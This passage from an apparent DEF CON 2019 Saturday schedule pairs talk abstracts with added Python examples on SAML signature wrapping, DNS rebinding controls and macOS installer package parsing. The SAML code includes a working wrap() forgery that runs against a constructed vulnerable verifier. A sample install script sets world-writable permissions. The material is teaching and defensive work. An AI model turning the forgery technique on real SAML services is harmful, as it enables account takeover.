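DS = "http://www.w3.org/2000/09/xmldsig#"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
ET.register_namespace("ds", DS)
ET.register_namespace("saml", SAML)

# Constructed shared secret standing in for the IdP's RSA key (assumption: HMAC
# keeps the example stdlib-only; the wrapping logic is the same with RSA).
IDP_KEY = b"demo-idp-key"


def c14n(elem: ET.Element) -> bytes:
    """Canonical bytes of one subtree, the input to digests and signatures."""
    return ET.canonicalize(ET.tostring(elem, encoding="unicode")).encode()


def build_response(subject: str, assertion_id: str = "_a1") -> bytes:
    """IdP side: a Response with one Assertion, signed via a Reference to its ID."""
    resp = ET.Element(f"{{{SAML}}}Response")
    assertion = ET.SubElement(resp, f"{{{SAML}}}Assertion", ID=assertion_id)
    ET.SubElement(assertion, f"{{{SAML}}}Subject").text = subject
    sig = ET.SubElement(resp, f"{{{DS}}}Signature")
    signed_info = ET.SubElement(sig, f"{{{DS}}}SignedInfo")
    ref = ET.SubElement(signed_info, f"{{{DS}}}Reference", URI=f"#{assertion_id}")
    ET.SubElement(ref, f"{{{DS}}}DigestValue").text = hashlib.sha256(c14n(assertion)).hexdigest()
    ET.SubElement(sig, f"{{{DS}}}SignatureValue").text = hmac.new(
        IDP_KEY, c14n(signed_info), "sha256").hexdigest()
    return ET.tostring(resp)


def wrap(signed_response: bytes, forged_subject: str) -> bytes:
    """Attacker side: leave the signed Assertion untouched (digest and signature
    still verify) and insert an unsigned Assertion with a new subject first."""
    root = ET.fromstring(signed_response)
    forged = ET.Element(f"{{{SAML}}}Assertion", ID="_evil")
    ET.SubElement(forged, f"{{{SAML}}}Subject").text = forged_subject
    root.insert(0, forged)
    return ET.tostring(root)


def verify_signature(root: ET.Element) -> ET.Element:
    """Shared step: check SignatureValue over SignedInfo and the digest of the
    referenced element. Returns the element the signature actually covers."""
    sig = root.find(f"{{{DS}}}Signature")
    signed_info = sig.find(f"{{{DS}}}SignedInfo")
    expected = hmac.new(IDP_KEY, c14n(signed_info), "sha256").hexdigest()
    if not hmac.compare_digest(expected, sig.findtext(f"{{{DS}}}SignatureValue", "")):
        raise ValueError("bad signature")
    ref = signed_info.find(f"{{{DS}}}Reference")
    target_id = ref.get("URI")[1:]
    target = next((e for e in root.iter() if e.get("ID") == target_id), None)
    if target is None:
        raise ValueError("reference does not resolve")
    if hashlib.sha256(c14n(target)).hexdigest() != ref.findtext(f"{{{DS}}}DigestValue"):
        raise ValueError("digest mismatch")
    return target


def vulnerable_subject(response: bytes) -> str:
    """Flawed SP: signature verified, then the FIRST Assertion in the document is
    consumed, with no check that it is the element the signature covered."""
    root = ET.fromstring(response)
    verify_signature(root)
    return root.find(f"{{{SAML}}}Assertion").findtext(f"{{{SAML}}}Subject")


def hardened_subject(response: bytes) -> str:
    """Fixed SP: consume only the element the Reference resolved to, require it
    to be an Assertion, and reject documents carrying any other Assertion."""
    root = ET.fromstring(response)
    signed = verify_signature(root)
    assertions = root.findall(f".//{{{SAML}}}Assertion")
    if signed.tag != f"{{{SAML}}}Assertion" or assertions != [signed]:
        raise ValueError("signed element is not the sole Assertion")
    return signed.findtext(f"{{{SAML}}}Subject")


if __name__ == "__main__":
    legit = build_response("alice")
    forged = wrap(legit, "admin")
    print("vulnerable SP accepts:", vulnerable_subject(forged))
    try:
        hardened_subject(forged)
    except ValueError as e:
        print("hardened SP rejects:", e)
```

The point of the hardened path is that "the signature verifies" and "this is the signed data" are two different questions; any SAML consumer that answers the first and then uses an XPath or `find()` to answer the second is in the flawed class regardless of how strong the signature algorithm is.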



DC - Paris - Track 3 - Saturday - 15:00-15:45


State of DNS Rebinding - Attack & Prevention Techniques and the Singularity of Origin

Saturday at 15:00 in Track 3
45 minutes | Demo, Tool

Gerald Doussot Principal Security Consultant, NCC Group

Roger Meyer Principal Security Consultant, NCC Group

Do you want to know how you can exploit DNS rebinding 10x faster, bypass prevention mechanisms, interactively browse the victim's internal network, and automate the whole process during your next red team exercise?

This talk will teach you how and give you an easy-to-use tool to do it.

First, we will cover in detail the subtleties that make DNS rebinding attacks more effective in practice, including techniques and operational conditions that make it faster and more reliable. We'll also explain how to bypass commonly recommended security controls, dispelling attack and defense misconceptions that have been disseminated in blogs and social media posts.

This talk will include a number of demos using Singularity, our open source DNS rebinding attack framework that includes all the parts you need to get started pwning today, including:

  • Remote code execution and exfiltration payloads for common dev tools and software
  • Practical scanning and automation techniques to maximize the chance of controlling targeted services

We'll also show an interesting post-exploitation technique that allows you to browse a victim browser network environment via the attacker's browser without the use of HTTP proxies.

You'll leave this talk with the knowledge and tools to immediately start finding and exploiting DNS rebinding bugs.

Gerald Doussot
Gerald Doussot is a Principal Security Consultant at NCC Group, with over 20 years' experience in information technology. Gerald has undertaken defensive and offensive security roles, including the design, implementation and management of security solutions, software development, integration and security testing.

Roger Meyer
Roger Meyer is a Principal Security Engineer at NCC Group with extensive experience in managing and leading complex engagements. Roger specializes in web application security, network penetration testing, configuration reviews, and secure software development and architecture design.
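The two controls most often recommended against DNS rebinding, a resolver that refuses to hand back internal addresses for external names and a service that checks its Host header, as an added example in Python; this is not Singularity's code and not the specific bypasses the talk covers. The filter deliberately closes the gaps naive implementations leave (0.0.0.0, IPv4-mapped IPv6 answers such as ::ffff:127.0.0.1, link-local including the cloud metadata address), which are known ways past such filters; the allowlist of internal names and the service names are constructed for the demo.

```python
import ipaddress


def is_rebinding_target(answer: str) -> bool:
    """True when a DNS answer points at an address a public hostname has no
    business resolving to: loopback, private/ULA, link-local, the unspecified
    address, reserved space, or an IPv4-mapped IPv6 form hiding one of those."""
    try:
        ip = ipaddress.ip_address(answer.strip())
    except ValueError:
        return False                      # CNAME or other RDATA, not an address
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped               # ::ffff:127.0.0.1 is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved)


def filter_answers(name: str, answers: list, internal_names: frozenset = frozenset()) -> list:
    """Resolver-side control: drop answers that would rebind an external name
    onto the local network, unless the operator explicitly allows that name
    (constructed allowlist, e.g. an intranet zone served by the same resolver)."""
    if name.rstrip(".").lower() in internal_names:
        return list(answers)
    return [a for a in answers if not is_rebinding_target(a)]


def host_header_ok(host_header: str, service_names: frozenset) -> bool:
    """Service-side control: a request that arrived through a rebound name still
    carries the attacker's hostname in Host. Accept only the names this service
    answers to, and never an IP literal (bracketed IPv6 or bare IPv4)."""
    host = host_header.strip().lower()
    if host.startswith("["):
        return False                      # [::1]:8080 style literal
    if host.count(":") == 1:
        host = host.rsplit(":", 1)[0]     # strip a port from name:port
    try:
        ipaddress.ip_address(host)
        return False                      # bare IPv4 (or unbracketed IPv6) literal
    except ValueError:
        pass
    return host.rstrip(".") in service_names


if __name__ == "__main__":
    # Constructed answers an attacker's authoritative server might return on the
    # second lookup of the rebinding sequence.
    print(filter_answers("rebind.attacker.example",
                         ["93.184.216.34", "127.0.0.1", "0.0.0.0", "::ffff:10.0.0.5"]))
    print(host_header_ok("rebind.attacker.example", frozenset({"admin.local"})))
```

Neither control is sufficient on its own: the resolver filter only helps for clients behind that resolver, and the Host check only protects services that enforce it, so the two should be combined with authentication on anything listening on loopback or the LAN.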



PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 17:00-17:59


State Sponsored Hacking: How to Intercept/Decrypt TLS Traffic and How to Prevent TLS Interception Attacks

Chris Hanlon, Agile Data Security Ltd.

Recent reports of the Global DNS Hijacking Campaign show state-sponsored attackers using Man In The Middle attacks to generate fraudulent TLS certificates and intercept web traffic. In this presentation, we show the audience how they can perform similar attacks and use the certificates to intercept web traffic, emails or their coworkers' VPN credentials. After demonstrating ways to trick 3 different certificate authorities into generating fraudulent TLS certificates, we explain simple ways to prevent these attacks.

Chris Hanlon (Twitter: @ChrisHanlonCA) runs an Information Security Consulting Business where he monitors and protects Endpoints, Routers, Servers, and Cloud Systems. In addition to protecting infrastructure, Chris also coaches software companies on ways to minimize vulnerabilities in their code and reduce their vulnerability to social engineering attacks. During his "free time", Chris finds/reports security vulnerabilities, hosts hack-a-thons, uses real world exploits to help developers understand security vulnerabilities, lectures at colleges, presents at conferences, organizes security conferences, and volunteers on the presentation review board for a BSides Conference.



CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 16:00


Stop Facebook From Buying Your Brain: Facial Recognition, DNA, and Biometric Privacy

No description available



CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 12:00


Stop right now! Quantum-Safe Instantaneous Vehicle to Vehicle communication

No description available



DC - Paris - Track 3 - Saturday - 13:00-13:45


Tag-side attacks against NFC

Saturday at 13:00 in Track 3
45 minutes | Demo, Tool

Christopher Wade

This talk covers tag-side attacks against NFC communication protocols, including cracking of Mifare encryption keys and performing targeted attacks against NFC readers. In addition, it will cover the design and creation of devices capable of emulating NFC tags down to the raw protocol using standard components and tools, with no abstraction to dedicated hardware, covering and expanding on the capabilities of available products. This talk will cover how 13.56MHz NFC works at a raw level, how tools can be built for analysing it, how the protocol can be implemented in full on standard microcontrollers, and the security weaknesses present in its design.

Christopher Wade
Chris is a seasoned security researcher and testing consultant. His main focuses are in reverse engineering hardware, fingerprinting USB vulnerabilities and playing with Software Defined Radios, with his key strength lying in firmware analysis, which he utilises as part of the hardware testing team at Pen Test Partners.

Twitter: @Iskuri1
Github: https://github.com/Iskuri



BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 14:15-15:59


Take back control of user data with the decentralized cloud

No description available



SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 18:50-19:20


Saturday August 10 2019 1850 30 mins
The Aspie’s Guide to Social Engineering Your Way Through Life
Perry Carpenter, Chief Evangelist & Strategy Officer for KnowBe4, will discuss how he, both knowingly and unknowingly, ethically used Social Engineering skills all throughout his career to be successful.

He hopes to teach and encourage others who struggle socially how to grow their careers by leaning into their personal differences. And to find the strengths embedded in those differences.

Perry Carpenter: @perrycarpenter
Perry Carpenter is the author of, “Transformational Security Awareness: What Neuroscientists, Storytellers, and Marketers Can Teach Us About Driving Secure Behaviors” from Wiley Publishing, and he currently serves as Chief Evangelist and Strategy Officer for KnowBe4, the world’s most popular security awareness and simulated phishing platform.

Previously, Perry led security awareness, security culture management, and anti-phishing behavior management research at Gartner Research, in addition to covering areas of IAM strategy, CISO Program Management mentoring, and Technology Service Provider success strategies. With a long career as a security professional and researcher, Mr. Carpenter has broad experience in North America and Europe, providing security consulting and advisory services for many of the best-known global brands.

Perry holds a Master of Science in Information Assurance (MSIA) from Norwich University in Vermont and is a Certified Chief Information Security Officer (C|CISO).



PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 19:00-19:59


The Cyberlous Mrs. Maisel: A Comedic (and slightly terrifying) Introduction to Information Warfare

J. Zhanna Malekos Smith, Duke Law School

Like a dear family relative who won't stop talking at Thanksgiving dinner, a backdoor exploit also talks to anyone who'll listen. Come listen to the Cyberlous Mrs. Maisel! She'll offer a satirical reflection on how we engage with technology in the Information Age and explain the basic historical principles that animate Russia's approach to information warfare. Topics covered include maskirovka (i.e., cover, concealment and deception), reflexive control, disinformation, and imitation, among others. Although a strategic objective of information warfare is to induce complacency with falsehoods, this presentation's unique style can help jolt the public's consciousness awake through its originality and bite.

J. Zhanna Malekos Smith is the Reuben Everett Cyber Scholar at Duke University Law School. Previously, she served as a Captain in the U.S. Air Force Judge Advocate General's Corps. Prior to military service, she was a post-doctoral fellow at the Belfer Center's Cyber Security Project at the Harvard Kennedy School. She holds a J.D. from the University of California, Davis; a B.A. from Wellesley College, where she was a Fellow of the Madeleine Korbel Albright Institute for Global Affairs; and is finishing her M.A. with the Department of War Studies at King's College London. She has presented her research at DEF CON, RSA, and ShmooCon, among others.



LBV - Flamingo - Carson City II Room - Saturday - 18:00-18:59


Title:
The Human Body's Promise: How Your Bare Hands can Defeat Physical Security



BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 14:30-15:15


2:30 PM: The L33T Shall Inherit the Cosmos
Speaker: J.J. Hastings

Abstract: The era of the astro-jock is over, no more men in tin cans taking orders from mission control. Staying alive off Earth will require the ability to thrive in an environment that requires constant adaptation. Fellow hacker and analogue astronaut J.J. Hastings argues that hackers are an ideal match to the space environment. Her talk suggests how we might become extra-terrestrial hackers and shares insights from her missions as a field researcher and analogue astronaut.

Speaker Bio: A biohacker since 2009, JJ Hastings co-founded London Biohackspace and BioQuisitive, and has the first garage to be PC-1 certified in Australia. An alumna of NYU, Harvard and Oxford with advanced degrees in Biology and Bioinformatics, she is an analogue astronaut and field researcher for NASA/JPL.

T: @HackerAstro


BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 15:15-15:59


3:15 PM: The Story of SICGRL Vulnerability
Speaker: Andrea Downing

Abstract: A massive security vulnerability was discovered which allowed PHI to be leaked from closed patient support groups on Facebook. In this session we'll discuss how a coalition of patients and security researchers faced this crisis and explore the need to develop a new model for collective data governance on social media.

Speaker Bio: Andrea Downing is a BRCA Community Data Organizer and founder of Brave Bosom. Along with Fred Trotter, Andrea discovered a security vulnerability in Facebook's Group product that affected all closed groups on Facebook.

T: @BraveBosom


SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 18:15-18:45


Saturday August 10 2019 1815 30 mins
The Voice Told Me To Do It
Corporate colors and logos characteristic of a brand are easily and freely accessed on the network. As consumers we have been advised to distrust an email with these identities.

Instead, the voice gives us confidence. When we need help, the voice is there. It is the first thing we hear when we call, it tells us how wonderful and beneficial it is to be associated with that brand. A voice that will never harm us, until now.

Identity spoofing is one of the most used social engineering formats to initiate major attacks. But what if cyber-criminals could go further? What would happen if someone could not only impersonate, but actually use the identity of an institution to make an attack on a national level? Is it possible to do this with a minimal investment or without capital? The answer is yes.

Daniel Isler: @Fr1endlyRATs
Daniel Isler is a Security Consultant with a Bachelor in Arts of Representation, an actor, scenic communicator and voice-over artist, with more than 10 years of experience as an academic teaching acting classes at the University of Valparaíso, UNIACC University and Professional Institute Aiep. He also develops projects in the area of visual arts, which have been shown at contemporary art festivals in Chile, Argentina, Portugal and Spain. Since 2015 he has led the Social Engineering team at Dreamlab Technologies.
Certifications / Competencies:
• Advanced Practical Social Engineering, Orlando, FL, United States.
• Usable Security, University of Maryland, United States.
• Improvisation Summer School, Keith Johnstone Workshop Inc. Calgary, Canada.
• French for foreign language, Université de Pau et des Pays de L’adour, Pau, France.
• Diploma in commercial speech, dubbing and neutral accentuation, Voces de Marca, Caracas, Venezuela.
• Diploma in Digital Photography, Arcos Professional Institute.
• Diploma in Audiovisual Language, UNIACC University.



RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 16:00-16:59


Through the Looking Glass: Own the Data Center

The data center embodies the heart of many businesses on the Internet. It contains much of the information in a centralized location which provides a huge incentive for those who would wish harm. The data centers in the realm of Cloud may no longer contain just a single entity, but many individual tenants that attach to a common fabric. The Cisco Application Centric Infrastructure (ACI) aims to meet these needs with a multi-tenant, scalable fabric that interconnects physical hosts, VMs and containers. ACI is Cisco's answer to the centrally-managed Software Defined Network (SDN). The Application Policy Infrastructure Controller (APIC) and Nexus 9000 series switches form the brains and backbone of ACI.
A member of Cisco's Advanced Security Initiatives Group (ASIG) will demonstrate their findings during an evaluation of ACI and the APIC, more than three years before the BH2019 talk "APIC's Adventures in Wonderland." Step into the mind of an attacker and scan, probe, and interact with the network fabric to progress from an unauthenticated user to administrator and root of the data center switch fabric. Once inside the system, see how the APIC can be modified in a nearly undetectable manner to provide the attacker unfettered internal access to all the interconnected hosts and VMs in the data center. The target audience for this talk includes those with a technical interest in offensive discovery and secure product development. Participants will receive an overview of how a data center product is viewed in an offensive light.

About Chris McCoy: Chris is a technical leader in Cisco's Advanced Security Initiatives Group (ASIG) and published author of Security Penetration Testing, The Art of Hacking Series LiveLessons with Cisco Press. He has over 20 years of experience in the networking and security industry. He has a passion for computer security, finding flaws in mission-critical systems, and designing mitigations to thwart motivated and resourceful adversaries. He was formerly with Spirent Communications and the U.S. Air Force. Chris is CCIE certified (Emeritus) in the Routing & Switching and Service Provider tracks, which he has held for over 10 years. Twitter: @chris_mccoy




Meetups - Planet Hollywood - Mezzanine Stage - Saturday - 17:00-17:59


Title:
Tinfoil Hat Contest

No description available

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 13:00


Tiplines Today

No description available



CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 11:00


TLS decryption attacks and back-doors to secure systems

No description available



PHVW - Bally's - Indigo Tower - 26th Floor - Saturday - 11:20-13:20


Tools? We Don’t Need No Stinkin’ Tools: Hands-on Hacking with Python

Jason Nickola, Director of Technical Services, Pulsar Security
Wayne Marsh, Senior Software Engineer, Pulsar Security

The hacking world is full of fantastic tools, but the ability to write your own in order to customize and achieve new functionality is the real black magic. This workshop quickly builds from programming and python fundamentals to manual construction of real-world attack tactics and techniques. Prior hacking and programming skills are not required (although they help), but basic technical knowledge and an ahead-of-time review of introductory topics are highly recommended. Come in with nothing and leave with experience writing your own host and port scanner, reverse shell, packet parser, and more in a controlled (legal) environment.

Jason Nickola (Twitter: @chm0dx) is the Director of Technical Services at Pulsar Security, where he also serves as Principal Security Consultant. He can frequently be found working with clients to develop creative solutions to red- (and increasingly blue-) team challenges. Passionate about both technology and the lifelong learning process, Jason enjoys enabling others via teaching and aiding in career development. Jason is a SANS instructor for SEC560: Network Penetration Testing and Ethical Hacking and holds the GIAC Security Expert, GXPN, GREM, and OSCP certifications among others.

Wayne Marsh (Twitter: @infogroke) is a Security Consultant and the Senior Software Engineer at Pulsar Security where he spends his time programming, architecting enterprise products, and breaking into the occasional network. His varied career has involved television and satellite broadcast systems, games development, and marketing before finally focusing on the infosec industry in recent years, where he realized that the common thread in all of these areas of development is security. He loves both obsolete and new, as well as increasingly unfashionable genres of music. Wayne’s security credentials include OSCP, GPYC, GXPN, and GCIA.



CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 10:00


Towards Usable Dining Cryptographer Networks with Howl

No description available



DC - Paris - Track 1 - Saturday - 16:30-16:50


Unpacking Pkgs: A Look Inside Macos Installer Packages And Common Security Flaws

Saturday at 16:30 in Track 1
20 minutes | Demo

Andy Grant Technical Vice President, NCC Group

We are hackers, we won't do as you expect or play by your rules, and we certainly don't trust you. JAR files are really ZIPs...unzip them! So are Microsoft's DOCX, XLSX, PPTX, etc. Let's open them up! macOS applications (.app "files") are really directories you can browse?! Sweet, let's do that.

Less well known but similarly prevalent are Flat Package Mac OS X Installer (.pkg) files. These are actually XAR archives that, among other things, contain many plaintext files (including shell, Perl, and Python scripts) as cpio files compressed using gzip.

In this presentation I'll walk you through extracting the contents of these installer packages, understanding their structure, and seeing how they work while highlighting where security issues can come up. To drive the point home of what can go wrong, I'll include examples of serious security issues I've seen in the wild and show you how they can be exploited to elevate privileges and gain code/command execution.

After this talk, .pkg files will no longer be opaque blobs to you. You'll walk away knowing tools and techniques to tear them open, understand how to evaluate what they're really doing on your computer, and a methodology for finding bugs in them. As a final bonus, I'll include a subtle trick or two that can be used on red teams.

Andy Grant
Andy Grant is a Technical Vice President for NCC Group. While at NCC Group, Andy has worked on a wide-variety of security assessment and advisory projects. He has performed numerous application assessments on mobile (Android, iOS, WP7), desktop (OS X/macOS, Windows, Linux), and web platforms. He has also performed many internal and external network penetration tests and widget/third-party platform reviews. Andy has worked with small tech start-ups, small and large software development groups, and large financial institutions. Andy has a BS in Computer Science and an Advanced Computer Security Certificate from Stanford University.

Twitter: @andywgrant
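The container layout the abstract describes (a 28-byte XAR header, a zlib-compressed XML table of contents, then a heap of entries addressed by offset and size), as an added example in Python; this is not the speaker's tooling. The archive it parses is constructed in the block itself by a small builder, so it runs offline; a real `.pkg` additionally stores its Scripts and Payload members as gzip-compressed cpio streams, which this example does not unpack (the usage note below gives the command-line route for that). The sample package contents, script names and the `find_scripts` heuristic are constructed for the demo.

```python
import struct
import zlib
import xml.etree.ElementTree as ET

XAR_MAGIC = b"xar!"
# Big-endian header: magic, header size, version, compressed TOC length,
# uncompressed TOC length, checksum algorithm (0 = none).
XAR_HEADER = struct.Struct(">4sHHQQI")
GZIP = "application/x-gzip"   # XAR's label for a zlib-compressed heap entry


def build_xar(files: dict) -> bytes:
    """Assemble a minimal XAR archive from {path: bytes}. Constructed here so the
    parser below has input; a real .pkg has the same three regions."""
    heap = bytearray()
    root = ET.Element("xar")
    dirs = {"": ET.SubElement(root, "toc")}
    for n, (path, content) in enumerate(files.items(), start=1):
        parent = ""
        for part in path.split("/")[:-1]:          # one <file type="directory"> per component
            cur = parent + part + "/"
            if cur not in dirs:
                d = ET.SubElement(dirs[parent], "file")
                ET.SubElement(d, "name").text = part
                ET.SubElement(d, "type").text = "directory"
                dirs[cur] = d
            parent = cur
        f = ET.SubElement(dirs[parent], "file", id=str(n))
        ET.SubElement(f, "name").text = path.rsplit("/", 1)[-1]
        ET.SubElement(f, "type").text = "file"
        packed = zlib.compress(content)
        data = ET.SubElement(f, "data")
        ET.SubElement(data, "offset").text = str(len(heap))     # relative to heap start
        ET.SubElement(data, "size").text = str(len(packed))     # bytes in the heap
        ET.SubElement(data, "length").text = str(len(content))  # bytes after decoding
        ET.SubElement(data, "encoding", style=GZIP)
        heap += packed
    toc_xml = ET.tostring(root)
    toc_z = zlib.compress(toc_xml)
    header = XAR_HEADER.pack(XAR_MAGIC, XAR_HEADER.size, 1, len(toc_z), len(toc_xml), 0)
    return header + toc_z + bytes(heap)


def read_xar(blob: bytes) -> dict:
    """Parse the header, inflate the XML TOC, and pull every file entry out of
    the heap using the offsets and sizes the TOC declares. Returns {path: bytes}."""
    magic, hsize, _ver, toc_z_len, toc_len, _alg = XAR_HEADER.unpack_from(blob)
    if magic != XAR_MAGIC:
        raise ValueError("not a XAR archive")
    toc_xml = zlib.decompress(blob[hsize:hsize + toc_z_len])
    if len(toc_xml) != toc_len:
        raise ValueError("TOC length does not match header")
    heap = blob[hsize + toc_z_len:]
    entries = {}

    def walk(node, prefix):
        for f in node.findall("file"):
            path = prefix + (f.findtext("name") or "")
            data = f.find("data")
            if f.findtext("type") == "directory" or data is None:
                walk(f, path + "/")
                continue
            off, size = int(data.findtext("offset")), int(data.findtext("size"))
            raw = heap[off:off + size]
            enc = data.find("encoding")
            entries[path] = zlib.decompress(raw) if enc is not None and enc.get("style") == GZIP else raw

    walk(ET.fromstring(toc_xml).find("toc"), "")
    return entries


def find_scripts(entries: dict) -> dict:
    """{path: interpreter} for members that start with a shebang: the pre/post
    install scripts the installer runs as root, and the first thing to review."""
    return {p: c.split(b"\n", 1)[0][2:].decode().strip()
            for p, c in entries.items() if c.startswith(b"#!")}


# Constructed sample package: a Distribution, a PackageInfo and two install scripts.
SAMPLE = build_xar({
    "Distribution": b"<installer-gui-script minSpecVersion='1'/>",
    "demo.pkg/PackageInfo": b"<pkg-info identifier='com.example.demo'/>",
    "demo.pkg/Scripts/preinstall": b"#!/usr/bin/perl\nprint 'hi';\n",
    "demo.pkg/Scripts/postinstall": b"#!/bin/sh\nchmod -R 777 /Applications/Demo.app\n",
})

if __name__ == "__main__":
    for path, interp in find_scripts(read_xar(SAMPLE)).items():
        print(f"{path}: runs under {interp}")
```

On a Mac the same layers can be opened with the platform tools: `pkgutil --expand foo.pkg out/` unpacks the XAR and the Scripts member for you, and `xar -xf foo.pkg` followed by `gunzip -c Payload | cpio -i` (or `pkgutil --expand-full` on recent releases) reaches the files a package drops onto the system.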



RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 11:55-12:30


LIGHTNING TALK

Use Responsibly: Recon Like an insider threat for Best User Training ROI

1155 - 1230



CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 13:45-14:25


Speaker: Rod Soto

Twitter: @rodsoto

Abstract: This presentation shows how to use Splunk to provide the analyst with a comprehensive vision of AWS/GCP/Azure security posture. Presenters will outline how to ingest the audit data provided by open source tool Cloud Security Suite into Splunk to analyze cloud vulnerability, harden multi-cloud deployments and visualize multi-cloud threat surface. Presenters will also demonstrate use cases based on Splunk knowledge objects (Tables, Dashboards, Alerts, Field extractions, Lookups, etc), in order to take advantage of the information provided by various supporting tools like Scout2 and G-Scout projects for cloud API auditing.

About Rod: Rod Soto has over 15 years of experience in information technology and security. He currently works as Principal Security Research Engineer at Splunk. He has spoken at ISSA, ISC2, OWASP, DEFCON, Hackmiami and Bsides and has also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the 2012 BlackHat Las Vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive hacking tournament series.



DC - Paris - Track 4 - Saturday - 16:00-16:30


Vacuum Cleaning Security—Pinky and the Brain Edition

Saturday at 16:00 in Track 4
20 minutes | Exploit

jiska TU Darmstadt, Secure Mobile Networking Lab

clou (Fabian Ullrich)

Data collected by vacuum cleaning robot sensors is highly privacy-sensitive, as it includes details and metadata about consumers' habits, how they live, when they work or invite friends, and more. Connected vacuum robots are not as low-budget as other IoT devices, and vendors do invest in their security. This makes vacuum cleaning robot ecosystems interesting for further analysis to understand their security mechanisms and derive takeaways.

In this talk we discuss the security of the well-protected Neato and Vorwerk ecosystems. Their robots run the proprietary QNX operating system, are locally protected with secure boot, and use various mechanisms that ensure authentication and encryption in the cloud communication. Nonetheless, we were able to bypass substantial security components and even gain unauthenticated privileged remote execution on arbitrary robots. We present how we dissected ecosystem components including a selection of vacuum robot firmwares and their cloud interactions.

jiska
Jiska has a M.Sc. in IT-Security. She is a PhD student at the Secure Mobile Networking Lab (TU Darmstadt) since May 2014. Her main research interest are wireless physical layer security and reverse engineering. You might also know her embroidery projects or game shows from past CCC events.

Twitter: @seemoolab

clou (Fabian Ullrich)
Fabian has a M.Sc. in IT-Security. He is working as a researcher and analyst at ERNW. His main research interests are full stack IoT and web application security. In his free time, Fabian likes to capture some flags.



RGV - Flamingo - 3rd Floor - Carson City II - Saturday - 17:00-17:59


Title:
Verbal Steganography Workshop

Verbal Steganography Workshop with Four Suits Co. Space will be limited. Sign-up is available here

RGV - Flamingo - 3rd Floor - Carson City II - Saturday - 16:00-16:59


Title:
Verbal Steganography

Verbal Steganography
Four Suits Co. presents a talk (and demonstration) of live steganographic communication. Boiled down to its simplest form, that means all the ways for two or more people to secretly, and in an analog way, communicate with each other. This includes physical and verbal codes, as well as memory systems and shortcuts that allow large amounts of information to be remembered and transferred from person to person.

ETV - Flamingo - 3rd Floor - Reno II Room - Saturday - 10:00-10:59


Title:
Void If Removed: Securing Our Right to Repair



DC - Planet Hollywood - Firesides Lounge - Saturday - 22:15-22:59


We Hacked Twitter… And the World Lost Their Sh*t Over It!

Saturday at 22:15 in Firesides Lounge
45 minutes

Mike Godfrey Penetration Tester, INSINIA Security

Matthew Carr Penetration Tester, INSINIA Security

In December 2018 INSINIA Security was involved in one of the biggest hacking stories of the year. A number of “celebrities”, including Louis Theroux, Eamon Holmes and more, logged into their Twitter accounts just after Christmas to find a Tweet, from their account, saying:

“This account has been temporarily hijacked by INSINIA SECURITY”.

The tweet immediately directed people to our blog post, and the compromised accounts retweeted INSINIA’s Tweet, saying:

“This account is now under the control of @InsiniaSRT. Luckily, this has been H4CK3D to highlight an important vulnerability. The user of this account has NOT lost access to it, no data compromised and is NOT under attack. See how it was done…”.

What we did was simple. We used spoof texts to Tweet from these accounts. We NEVER had access to these accounts. We could never read DM’s. We simply passively controlled these accounts with no opportunity of getting confidential data in return.

So what did the hacking community, journalists and commentators do?! They LOST THEIR SH*T OVER IT!

“It’s unethical” “It’s a crime” “Computer Misuse Act counts for security researchers too!” “You guys are total f*cking idiots!

These are the types of things we’d heard from our peers. But why was the backlash so bad? In this talk, INSINIA explains why it was done, how it was done, how people reacted and how research can be released quickly and responsibly… Without always getting the warm reception you might expect!

Mike Godfrey
Mike Godfrey, Director of INSINIA Security, started life as a "hacker" before he had hit his teens, and has a professional background in Electro-technical / Electro-mechanical Engineering and almost 20 years' experience in building and breaking computers.

Mike offers a unique perspective when it comes to varied and multi-vector attacks and is regarded as one of the UK’s most capable multi-skilled Cyber Security Specialists, gaining notoriety in the Cyber Security industry for using elements of different skills, both on hard and soft surfaces, to carry out highly technical and often highly intricate electronic attacks. One of these attacks includes hacking Costco’s high security Sentry display safe with nothing more than a magnet and a sock! This research was utilised and referenced by @Plor in his talk at DEF CON 25 – “Popping a Smart Gun”. Mike has also been lucky enough to become a DEF CON speaker in 2018, one of the proudest moments of his life!

Mike works as a Cyber Security contributor for the BBC, LBC, Channel 4 and was the Ethical Hacker who discovered the TalkTalk and O2 data breach stories.

Twitter: @MikeGHacks

Matthew Carr
Matthew's previous roles include Senior Penetration Tester and Researcher at SecureLink, Europe's largest managed security services provider, and Operational Security Specialist at Ikea, overseeing worldwide Operational Security as part of a Specialist Team.

Matthew regularly speaks at industry events and lectures offensive security at Malmö's Technology University in Sweden.

Matthew spent over 3 years as part of an R&D team building intrusion detection software, a secure cloud platform, SIEM tools and other security software, so he is not only a competent red teamer but also a valuable asset to any blue team.

Matthew works as a Cyber Security contributor for the Telegraph, Talk Radio and SVT.

Twitter: @sekuryti


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 10:00-10:45


Weaponizing Hypervisors to Fight and Beat Car and Medical Devices Attacks

Saturday at 10:00 in Track 1
45 minutes | Demo, Tool

Ali Islam CEO, Numen Inc.

Dan Regalado (DanuX) CTO, Numen Inc

Historically, hypervisors have lived in the cloud, where they exist for efficient utilization of resources, space and money. Their isolation property is one of the reasons hypervisors are now moving into other ecosystems such as automobiles, so that, for example, if the infotainment system crashes it does not affect other sensitive ECUs such as ADAS. BlackBerry QNX and AGL have announced the use of hypervisors in their automotive deployments.

